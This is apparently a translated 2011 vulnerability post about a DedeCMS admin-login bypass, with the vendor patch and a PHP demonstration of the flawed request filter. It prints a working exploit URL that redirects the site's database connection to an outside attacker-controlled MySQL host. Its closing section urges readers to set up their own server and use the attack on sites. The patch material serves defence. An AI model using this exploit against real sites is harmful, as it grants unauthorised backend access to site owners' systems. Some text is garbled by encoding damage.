myhack58 | Anonymous | MYHACK58:62201131562
History: Aug 12, 2011 - 12:00 a.m.

DEDECMS: any account and password gets straight into the backend - vulnerability warning - Black Bar Safety Net


As is well known, because it is simple to use and has a large user base, DedeCMS has had many vulnerabilities exposed. Today the editor picked up a reliable message from a moderator on the official Dede forum: “DEDECMS has a serious security vulnerability; an official patch will be released shortly, so everyone please watch for the patch.”

The intrusion goes as follows: http://www.xxx.com/<DedeCMS admin directory>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change the highlighted letters (the validate value, dcug above) to the current captcha code, and you go straight into the site's backend.

The editor's analysis: the precondition for this vulnerability is that the backend path MUST be known, so when building a site with DedeCMS you should make a habit of renaming the admin directory. Next is the official fix:

Solution:
Open the include/common.inc.php file and locate

foreach($_REQUEST as $_k=>$_v)
{
    // Only the top-level keys of $_REQUEST are inspected here; keys nested
    // inside array parameters (e.g. _POST[GLOBALS][cfg_dbhost]) are never seen.
    if( strlen($_k)>0 && preg_match('#^(cfg|GLOBALS)#',$_k) )
    {
        exit('Request var not allow!');
    }
}

Replace it with:

//Check and register externally submitted variables
function CheckRequest(&$val) {
    if (is_array($val)) {
        // Recurse into nested arrays, checking every key and every value
        foreach ($val as $_k=>$_v) {
            CheckRequest($_k);
            CheckRequest($val[$_k]);
        }
    } else {
        if( strlen($val)>0 && preg_match('#^(cfg|GLOBALS)#',$val) )
        {
            exit('Request var not allow!');
        }
    }
}
CheckRequest($_REQUEST);
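To see why the original loop misses the request above while the recursive version does not, here is an added PHP example (my own code, not DedeCMS code and not from the original post). It parses a constructed query string with parse_str(), which builds the same nested array PHP places in $_REQUEST for bracketed parameter names, and runs both checks over it; the function names are mine, matches are collected instead of calling exit(), and the database host is a placeholder.

```php
<?php
// Flat check, as in the unpatched include/common.inc.php: top-level keys only.
function flatOffenders(array $request): array {
    $hits = [];
    foreach ($request as $k => $v) {
        if (strlen((string)$k) > 0 && preg_match('#^(cfg|GLOBALS)#', (string)$k)) {
            $hits[] = (string)$k;
        }
    }
    return $hits;
}

// Recursive check in the spirit of the patched CheckRequest(): walks nested
// arrays and inspects every key and every scalar value, returning the paths
// that would have triggered exit('Request var not allow!').
function recursiveOffenders($val, string $path = ''): array {
    $hits = [];
    if (is_array($val)) {
        foreach ($val as $k => $v) {
            $here = $path === '' ? (string)$k : $path . '[' . $k . ']';
            if (preg_match('#^(cfg|GLOBALS)#', (string)$k)) {
                $hits[] = $here;
            }
            $hits = array_merge($hits, recursiveOffenders($v, $here));
        }
    } elseif (strlen((string)$val) > 0 && preg_match('#^(cfg|GLOBALS)#', (string)$val)) {
        $hits[] = $path . '=' . $val;
    }
    return $hits;
}

// Constructed query string shaped like the request in the advisory
// (DB_HOST_PLACEHOLDER stands in for the database host value).
$query = 'dopost=login&userid=admin&pwd=inimda'
       . '&_POST[GLOBALS][cfg_dbhost]=DB_HOST_PLACEHOLDER'
       . '&_POST[GLOBALS][cfg_dbuser]=root';
parse_str($query, $request);   // $request['_POST']['GLOBALS']['cfg_dbhost'] = ...

// The flat check sees only dopost, userid, pwd and _POST: nothing matches.
print_r(flatOffenders($request));
// The recursive check reports _POST[GLOBALS], _POST[GLOBALS][cfg_dbhost]
// and _POST[GLOBALS][cfg_dbuser], so the request would be rejected.
print_r(recursiveOffenders($request));
```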

============================================== dividing line ==============================================

[Figure]

When you see this figure, do not panic and do not be surprised. It is not that the Dede vulnerability has been blocked, but that the Black Wide big cow (http://hi.baidu.com/0x�н�/) has been played tired. Then you have to set up a MySQL server locally yourself, and change the connection account in login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root to your own. I wish you good luck.